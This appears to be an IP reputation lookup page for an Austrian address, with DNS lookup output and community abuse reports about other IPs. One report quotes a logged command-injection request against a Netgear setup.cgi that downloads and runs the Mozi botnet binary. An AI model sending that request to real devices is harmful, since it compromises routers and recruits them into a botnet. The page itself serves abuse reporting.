Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: Austria

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 194.232.139.48
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36002
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;194.232.139.48.			IN	A

;; AUTHORITY SECTION:
.			538	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019092700 1800 900 604800 86400

;; Query time: 126 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Sep 27 14:45:21 CST 2019
;; MSG SIZE  rcvd: 118
Host info
Host 48.139.232.194.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 48.139.232.194.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
193.32.163.9 attackbotsspam
2020-02-22T10:53:27.363181+01:00 lumpi kernel: [7655034.627014] INPUT:DROP:SPAMHAUS_EDROP:IN=eth0 OUT= MAC=52:54:a2:01:a5:04:d2:74:7f:6e:37:e3:08:00 SRC=193.32.163.9 DST=78.46.199.189 LEN=40 TOS=0x00 PREC=0x00 TTL=244 ID=44072 PROTO=TCP SPT=51721 DPT=6077 WINDOW=1024 RES=0x00 SYN URGP=0 
...
2020-02-22 19:38:44
180.76.135.236 attack
Invalid user nodeclient from 180.76.135.236 port 37836
2020-02-22 19:32:06
182.75.149.197 attackbotsspam
Honeypot attack, port: 445, PTR: nsg-static-197.149.75.182-airtel.com.
2020-02-22 19:30:36
119.93.148.45 attack
Unauthorized connection attempt from IP address 119.93.148.45 on Port 445(SMB)
2020-02-22 19:33:09
45.95.168.111 attackspambots
Invalid user y from 45.95.168.111 port 50838
2020-02-22 19:18:28
111.40.111.207 attack
GPON Home Routers Remote Code Execution Vulnerability
2020-02-22 19:18:06
42.112.118.195 attackspam
Attempt to attack host OS, exploiting network vulnerabilities, on 22-02-2020 04:45:10.
2020-02-22 19:23:56
51.178.27.119 attackspam
Lines containing failures of 51.178.27.119
Feb 20 20:28:43 comanche sshd[13110]: Connection from 51.178.27.119 port 60860 on 168.235.108.111 port 22
Feb 20 20:31:09 comanche sshd[13132]: Connection from 51.178.27.119 port 46786 on 168.235.108.111 port 22
Feb 20 20:31:10 comanche sshd[13132]: Received disconnect from 51.178.27.119 port 46786:11: Normal Shutdown, Thank you for playing [preauth]
Feb 20 20:31:10 comanche sshd[13132]: Disconnected from authenticating user r.r 51.178.27.119 port 46786 [preauth]
Feb 20 20:31:15 comanche sshd[13134]: Connection from 51.178.27.119 port 52659 on 168.235.108.111 port 22
Feb 20 20:31:16 comanche sshd[13134]: Received disconnect from 51.178.27.119 port 52659:11: Normal Shutdown, Thank you for playing [preauth]
Feb 20 20:31:16 comanche sshd[13134]: Disconnected from authenticating user r.r 51.178.27.119 port 52659 [preauth]
Feb 20 20:31:22 comanche sshd[13136]: Connection from 51.178.27.119 port 58532 on 168.235.108.111 port 22
Feb 20........
------------------------------
2020-02-22 19:53:49
51.158.120.115 attackbotsspam
Invalid user www from 51.158.120.115 port 53352
2020-02-22 19:58:10
118.25.103.132 attack
$f2bV_matches
2020-02-22 19:55:49
49.143.32.6 attackspambots
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
2020-02-22 19:36:03
41.208.150.114 attackspam
frenzy
2020-02-22 19:31:45
175.5.80.153 attackspam
Automatic report - Port Scan Attack
2020-02-22 19:22:06
186.67.248.5 attack
Invalid user 22 from 186.67.248.5 port 39196
2020-02-22 19:50:49
78.131.11.10 attackbots
SSH-bruteforce attempts
2020-02-22 19:34:26

Recently Reported IPs

185.236.42.109 180.76.232.120 61.94.150.113 104.230.107.18
59.84.129.172 165.22.254.47 103.97.124.200 249.218.3.182
125.37.160.51 210.66.135.8 117.156.165.3 177.95.200.171
200.89.125.254 98.111.207.60 198.237.121.118 178.242.58.6
23.140.160.36 77.244.217.252 140.210.9.80 113.222.204.75